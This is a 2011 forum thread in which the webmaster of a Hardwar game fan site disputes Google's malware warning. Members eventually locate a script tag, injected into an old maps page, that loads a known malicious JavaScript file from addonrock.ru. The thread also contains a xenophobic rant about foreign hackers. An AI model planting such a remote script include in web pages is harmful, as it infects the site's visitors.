Google warns against visiting zedo.hardwar.org.uk

[Pilot]

Aug 8, 2011 20:49:41 GMT -5 pamiam said:

I understand your frustration, and I am completely sympathetic.

NFO, it's not just Google. It's a 3rd party clearinghouse watchdog thing. Even if one does not use Google or any other SE to find the site, the blacklist will appear in a browser/anti-virus/malware/etc. engine and the site will be blocked. That happens due to a valid reason, and it's your onus to repair, secure and de-tag the site. Google and/or Microsoft are not personally conspiring against you. There really is a valid and recent condition on your site that is causing the block.

I understand it's a PITA, but don't be so down on it - it is an effective, and unfortunately made-necessary, safety feature at-large on the modern web.

No need to name any names. Both old and new school connections appreciate namelessness. Let's honor that at every opportunity, and simply address the issues at hand.

That was cleaned in 2004 and no detectable infection has come about since.

That's incorrect. Your site most assuredly directly hosted something malicious last month of this year. I wish I could tell you what it was. If you'll read the output, it spells it out for you. I am not the site owner, so you are privy to far more information than I. If you need any assistance cleaning this up and blocking further exploits, I will be happy to help. I appreciate the fact that you have backups, and are willing to upload them. Please be sure the backups are not infected, and that the uninfected backup is *complete*. If only 1 file is either infected or overlooked, the blacklist will stand. But again, you should be able to view specific information pertaining to exactly what file(s) is/are infected, and how.

Again, it's not enough to simply clean it up. You must enact measures to prevent further exploits or you'll jump through all of these hoops just to end up on the blacklist again because your site truly is infected and harmful.

If the scum that did this to you the first time find the same security breech opportunity, they'll just do it again - and rest assured they'll be fast, expedient and automated and you'll be back to square 1.

Surely you do not want to expose your trusted and loyal visitors to any sort of hacker/spammer garbage, right?

Old school notwithstanding, we are all forced to jump through new-school hoops, and if one doesn't want their site blacklisted by modern security measures (another discussion), these are the hoops through which one must jump.

Again, you have my utmost sympathies. Been there, done that, and even if you know Bill Gates personally, it won't help in this situation.

<soapbox>And &*%$ site hackers. We should blacklist them all, and if everyone jumped through THOSE hoops then we wouldn't be having this discussion. THEY are the reason for our problems, and no hoop jumping or extra security measures would be necessary without that scum. And chances are they are NOT American (or UK, Canadian or Australian) which gives me every good reason to hate BACK! And every good 1st World Country citizen should do their part to protect their piece of the internet against 3rd world hacker scum, and support others who are working toward that goal. And hate Microsoft all you want as well, but do remember that without them you'd have to configure your own software to call my dial-up BBS in the US to have this discussion, which wouldn't even be necessary because you wouldn't have had a website to offer in the first place.

And I happen to be not only American, but the first female Sysop that I know of EVER, and one of the first 10,000 people on this planet to push FidoNet email around the globe.

So, you're sitting there telling me about why "people Hate Americans" (including me, since I am one) because you've let your website become a host to hacker scum garbage and we're just trying to point it out, protect your visitors, and help you fix it? Tell me - am I wasting my time here?! Need friends? Or do you think you're fine just the way things are? Pick. I'll be happy to back off, sack the site support and vote to pull the troops.

With that hateful and unappreciative attitude you've shown me, I'm fine either way at this point - with *everything*. Pick.</soapbox>

So, thanks for the hoop jumping. I hope you get it cleaned up and blocked from further attacks (both the site and the country)

Again, if you need any assistance (with anything), let me know. Happy to help (unless you hate me and rather I didn't, at which point I'll be happy to leave you on your own).

Our paths crossed in this world because we love the same game. I came in here with respect for you.

Pam

To quote a peasant in Stronghold 2, "I'm confused."

Are you perhaps quoting someone in the brackets that are entitled <soapbox>? I do remember an Australian website by that name it was a bit of test you web based hacking skills, and you powers of observation I guess it went down some time in 2006.

I would also like to ask something else, do you have any ideas what might have caused it? There are tons of sites out there that are more deserving to be tagged than this site, I know that more than a few of the mods or "game hacking" tools may show up as a pseudo virus on different virii scanners but I don't know of anything here that has tried to hijack a web-browser or self install a virus.

[Captain Zedo]

Aug 8, 2011 20:49:41 GMT -5 pamiam said:

I understand your frustration, and I am completely sympathetic.

NFO, it's not just Google. It's a 3rd party clearinghouse watchdog thing. Even if one does not use Google or any other SE to find the site, the blacklist will appear in a browser/anti-virus/malware/etc. engine and the site will be blocked. That happens due to a valid reason, and it's your onus to repair, secure and de-tag the site. Google and/or Microsoft are not personally conspiring against you. There really is a valid and recent condition on your site that is causing the block.

I understand it's a PITA, but don't be so down on it - it is an effective, and unfortunately made-necessary, safety feature at-large on the modern web.

No need to name any names. Both old and new school connections appreciate namelessness. Let's honor that at every opportunity, and simply address the issues at hand.

That was cleaned in 2004 and no detectable infection has come about since.

That's incorrect. Your site most assuredly directly hosted something malicious last month of this year. I wish I could tell you what it was. If you'll read the output, it spells it out for you. I am not the site owner, so you are privy to far more information than I. If you need any assistance cleaning this up and blocking further exploits, I will be happy to help. I appreciate the fact that you have backups, and are willing to upload them. Please be sure the backups are not infected, and that the uninfected backup is *complete*. If only 1 file is either infected or overlooked, the blacklist will stand. But again, you should be able to view specific information pertaining to exactly what file(s) is/are infected, and how.

Again, it's not enough to simply clean it up. You must enact measures to prevent further exploits or you'll jump through all of these hoops just to end up on the blacklist again because your site truly is infected and harmful.

If the scum that did this to you the first time find the same security breech opportunity, they'll just do it again - and rest assured they'll be fast, expedient and automated and you'll be back to square 1.

Surely you do not want to expose your trusted and loyal visitors to any sort of hacker/spammer garbage, right?

Old school notwithstanding, we are all forced to jump through new-school hoops, and if one doesn't want their site blacklisted by modern security measures (another discussion), these are the hoops through which one must jump.

Again, you have my utmost sympathies. Been there, done that, and even if you know Bill Gates personally, it won't help in this situation.

<soapbox>And &*%$ site hackers. We should blacklist them all, and if everyone jumped through THOSE hoops then we wouldn't be having this discussion. THEY are the reason for our problems, and no hoop jumping or extra security measures would be necessary without that scum. And chances are they are NOT American (or UK, Canadian or Australian) which gives me every good reason to hate BACK! And every good 1st World Country citizen should do their part to protect their piece of the internet against 3rd world hacker scum, and support others who are working toward that goal. And hate Microsoft all you want as well, but do remember that without them you'd have to configure your own software to call my dial-up BBS in the US to have this discussion, which wouldn't even be necessary because you wouldn't have had a website to offer in the first place.

And I happen to be not only American, but the first female Sysop that I know of EVER, and one of the first 10,000 people on this planet to push FidoNet email around the globe.

So, you're sitting there telling me about why "people Hate Americans" (including me, since I am one) because you've let your website become a host to hacker scum garbage and we're just trying to point it out, protect your visitors, and help you fix it? Tell me - am I wasting my time here?! Need friends? Or do you think you're fine just the way things are? Pick. I'll be happy to back off, sack the site support and vote to pull the troops.

With that hateful and unappreciative attitude you've shown me, I'm fine either way at this point - with *everything*. Pick.</soapbox>

So, thanks for the hoop jumping. I hope you get it cleaned up and blocked from further attacks (both the site and the country)

Again, if you need any assistance (with anything), let me know. Happy to help (unless you hate me and rather I didn't, at which point I'll be happy to leave you on your own).

Our paths crossed in this world because we love the same game. I came in here with respect for you.

Pam

Yeah, I get a lot of people saying it *must* be infected, but can't quite find the actual line or script outside the Google warning. There is no malicious script in the site. When you get the warning go to the site. View the source code. Find the malicious scripting as in actual statements. I do this daily and haven't found anything since the warnings started. The script Google claims to exist simply doesn't. *Look for yourself*!

[RoadDemon]

Aug 6, 2011 6:27:34 GMT -5 rotary said:

I get a virus-warning from my virusscanner (Avast!) when going to this adress..


zedo.hardwar.org.uk/maps/mainmapindex.htm
Infection: HTML:Script-inf

Maybe that has something to do with Google blocking the forum?

Could it be something related to what rotary posted? I got the same warnings when I went to that link.

[Captain Zedo]

Aug 9, 2011 2:19:19 GMT -5 duncan said:

I had a couple of times warnings pop up over flash scripts not too long ago when visiting the forum. Btw. why is it that the forum is also warned against? Since you are talking about zedos website. Because the forum is quite new and hosted somewhere else, proboards.

Is it not just that the name Zedo is also a virus or spyware or tracking cookie called Zedo?

Quoting the internet:
"PC Hell: How to Remove Popups from Powered By Zedo"

duncan:

There is a company that uses "zedo" in its name that does issue commercial cookies. They cause no harm, but are 3rd party tracking cookies. They also do some click-based advertising. I haven't heard of them much lately, but they are still around.

I pre-date them by several years have no relationship to them. Google's problem is that they are simply wrong, often are, never admit it, and don't improve anything.

In a new post, I've posted a full page of source code that Google claims is infected. It was taken right from my browser's source code viewer and pasted, in full, to the post. If you can find an infection overlooked by me and my software, please point it out. If you can't find one, point that out to Google and its supporters.

[Pilot]

Hey Zedo, try removing the following from the bottom line of mainmapindex.htm,

Code:
<script type="text/javascript" src="http://addonrock.ru/Paste.js"></script>



I noticed the site was trying to connect to that .ru (russian) link when I loaded the page.

<EDIT> Please take notice of the bold.
Safe Browsing
Diagnostic page for addonrock.ru

What is the current listing status for addonrock.ru?

Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

Of the 217 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-09, and the last time suspicious content was found on this site was on 2011-08-09.

This site was hosted on 1 network(s) including AS42755 (ICTALPHEN).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, addonrock.ru did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 5276 domain(s), including atameken-asar.com/, glaser-kollegen.de/, fashion-store.at/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
</EDIT>

[Captain Zedo]

Aug 9, 2011 17:31:52 GMT -5 Pilot said:

Hey Zedo, try removing the following from the bottom line of mainmapindex.htm,

Code:
<script type="text/javascript" src="addonrock.ru/Paste.js"></script>



I noticed the site was trying to connect to that .ru (russian) link when I loaded the page.

<EDIT> Please take notice of the bold.
Safe Browsing
Diagnostic page for addonrock.ru

What is the current listing status for addonrock.ru?

Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

Of the 217 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-09, and the last time suspicious content was found on this site was on 2011-08-09.

This site was hosted on 1 network(s) including AS42755 (ICTALPHEN).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, addonrock.ru did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 5276 domain(s), including atameken-asar.com/, glaser-kollegen.de/, fashion-store.at/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
</EDIT>

Pilot:

Where?! That code is not on the page being served. If I overlooked it give me a line number or copy and paste the code with the code around it *in the posted code*. I'll take your word for it on your machine. I can only fix the served pages. The full code of the source on the server is posted in the "Site Not Infected" post.

I also encourage others to check the source code and look at <script> tags to check for a redirect other than the Atomz search engine. If you are seeing them, the problem may be with the sever. In that sad case, I'll have to change servers.

There is always the possibility that some viewer computers are infected with something that's redirecting them on several sites. The old Antagonist virus did this.

Despite what Google has to say either way, I test the site's integrity every month. So far this year, I haven't had any problems at all. The site does have a lot of dead links which causes warnings with some web analyzers.

As a final interesting note. The site on the main server has been mirrored, including work by Roaddemon, and no virus is found. To test Google, I've mad a private mirror to see if it gets blocked. It has not even though Google has spidered it twice. Same exact site that's being blocked at hardwar.org.uk

That makes me very suspicious of Google's methods. By the way, Google's webmaster tools are shit. They have never solved a problem. They are a font for the professional (read for-pay) tools that don't work, either.

[pamiam]

Zedo, the process has worked for me in this same circumstance, and it'll work just as well for you. You just have to accept the fact that your site has a problem, fix it, and run it through the check engines until it's done.


Moreover, you have to secure the site so that the bots don't just put the same stuff back out there.


It's free, and it's a tedious process. Suck it up or not. The first step is admitting you have a problem. /shrug

[pamiam]

Listen, if you need help on fixing this I will be happy to do that. Package up all of your files, and post them somewhere for me to DL. I'll clean the site and send them out for you to pick up and upload.

However, the site security problem will still exist. You'll have to fix that, or let someone into the site who can.

[pamiam]

Aug 9, 2011 2:11:09 GMT -5 duncan said:

The book 'Failed States' by Noam Chomsky paints a nice picture of why people hate americans, and brits.

I am NOT a hater, and I don't read the propaganda of anyone who provokes or perpetrates hate.

I do, however, respond when someone says they hate ME, particularly when it's for some arbitrary reason like where I happened to be BORN.

Look, we are here because we all love hardwar. Isn't that enough to promote a little kinship and respect??

[pamiam]

Aug 10, 2011 5:03:13 GMT -5 Captain Zedo said:

Aug 9, 2011 17:31:52 GMT -5 Pilot said:

Hey Zedo, try removing the following from the bottom line of mainmapindex.htm,

Code:
<script type="text/javascript" src="addonrock.ru/Paste.js"></script>



I noticed the site was trying to connect to that .ru (russian) link when I loaded the page.

<EDIT> Please take notice of the bold.
Safe Browsing
Diagnostic page for addonrock.ru

What is the current listing status for addonrock.ru?

Site is listed as suspicious - visiting this web site may harm your computer.

What happened when Google visited this site?

Of the 217 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2011-08-09, and the last time suspicious content was found on this site was on 2011-08-09.

This site was hosted on 1 network(s) including AS42755 (ICTALPHEN).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, addonrock.ru did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 5276 domain(s), including atameken-asar.com/, glaser-kollegen.de/, fashion-store.at/.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:

Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.
</EDIT>

Pilot:

Where?! That code is not on the page being served.

I concur with the listed analysis.

Even BEFORE you clean the files you must set up security measures to keep the hacker scum bots from re-infecting the site. They tend to do it pretty much immediately.

It's like trying to mop up after a broken pipe, without fixing the pipe first.

The first step in fixing a problem is admitting you actually have one and moving on to address it. Denial and finger-pointing isn't fixing anything or helping anyone. It really is a very real and immediate recurring problem on your site which needs to be addressed for the protection of both you and your visitors - moreover, to deny 3rd world hacker scum any victory over sites like yours.

It's a game they play, and right now they're winning.

[cobra]

Aug 10, 2011 5:03:13 GMT -5 Captain Zedo said:

As a final interesting note. The site on the main server has been mirrored, including work by Roaddemon, and no virus is found. To test Google, I've mad a private mirror to see if it gets blocked. It has not even though Google has spidered it twice. Same exact site that's being blocked at hardwar.org.uk

This makes me seriously wonder what's happening.

[Pilot]

Thank you Roaddemom for pointing it out. ^^

[Captain Zedo]

Aug 10, 2011 21:52:09 GMT -5 pamiam said:

Zedo, the process has worked for me in this same circumstance, and it'll work just as well for you. You just have to accept the fact that your site has a problem, fix it, and run it through the check engines until it's done.


Moreover, you have to secure the site so that the bots don't just put the same stuff back out there.


It's free, and it's a tedious process. Suck it up or not. The first step is admitting you have a problem. /shrug

I did find a problem! Or, more accurately, it was found by Pilot and others. It was in a subfolder I haven't updated in years. I've replaced the files from that folder and have scanned two other storage folders I use on that server.

The software applying the bots was discovered and removed from the server quite a while back. It was the only attack of which I am aware that effected my site. I don't own or administrate the server.

On the other hand, the problems Google allege have never existed. Their claims of an infected main page, etc. are patently false. I'm not sure if the RU script was even in the long, long list of malware I was accused of hosting. I have also caught them lying about the dates and times they claimed to have visited the site.

I'm grateful for the real help provided by those who found the script, but I doubt it will do anything toward Google unblocking my site. That's just not how Google works.

You may be wasting your time here, but that's for you to decide. I've never blocked any account or censored any posting (other than deleting some spam). I've got nothing against you. I don't know you. But, you've just been posting the same Google quotes I've heard before. The pilots that found the script in the old map folder are the real heroes in this.

I *have* gone through the tedious Google process and have seen no results, received no help or insight. Their list of malware on the site is unsubstantiated - they can't even tell me where all of these horrors lie. I turn, as I have in the past, to the site's viewers for help and they have come through yet again.

[pamiam]

Hooray! You found one!

Google really will tell you where and what. I know they are cryptic sometimes, but read it in geekenise.

Again, while Google is the most helpful site out there, they are not the blacklist powers that be. That's a clearinghouse, and they are FAR more difficult to deal with than Google. Google is a mere liason.

My browser still sends a warning, and Google has nothing to do with it, so the site is still not cleared - even if it is clean.

I sympathize and understand what a tedious pain it is not only to clean a site, but to clear it.

You have my wishes and utmost sympathy on this. And do be sure to ban that hacker scum. They are the cause of your problems, period.

[Captain Zedo]

Aug 12, 2011 23:32:28 GMT -5 pamiam said:

Hooray! You found one!

Google really will tell you where and what. I know they are cryptic sometimes, but read it in geekenise.

Again, while Google is the most helpful site out there, they are not the blacklist powers that be. That's a clearinghouse, and they are FAR more difficult to deal with than Google. Google is a mere liason.

My browser still sends a warning, and Google has nothing to do with it, so the site is still not cleared - even if it is clean.

I sympathize and understand what a tedious pain it is not only to clean a site, but to clear it.

You have my wishes and utmost sympathy on this. And do be sure to ban that hacker scum. They are the cause of your problems, period.

pamiam:
Google does *not* accurately tell a webmaster where and how they are infected. That's simply not true. They got my site wrong and you can see it for yourself by viewing the pages here! Googles claims are unfounded and they missed a scripted redirect that did exist. That's as wrong as it gets.

Google has been dead wrong on the more than one dozen viruses it claims the site currently contains. Please find them if you think there is an oversight. Google can't. They think my old frames-busting script is malicious. Well, it is to them because it screws up their hijacking of copyrighted content.

I've gone through the Google process with many clients many times and Google is just simply full of shit. I always check the Google references and they are *never* what is claimed where it is claimed to be. Not once in a decade of this.

I also challenge you to find a blocked site that carries Google Ads, even *with* the presence of malware. There isn't one. Google Ad sites can do no wrong. Visiting them is your real danger because there will be no warnings even if there is malware.

UK Web Guy seems to know how to run a server. They've only had two problems in over 12 years. *Way* better than average. It's run better than when I owned the server.

I have no problem in following the Google process. There's no reason to insult me by implying that I wouldn't understand geek. You have no idea...

Thanks again to the pilots that found the script redirect in the old maps folder.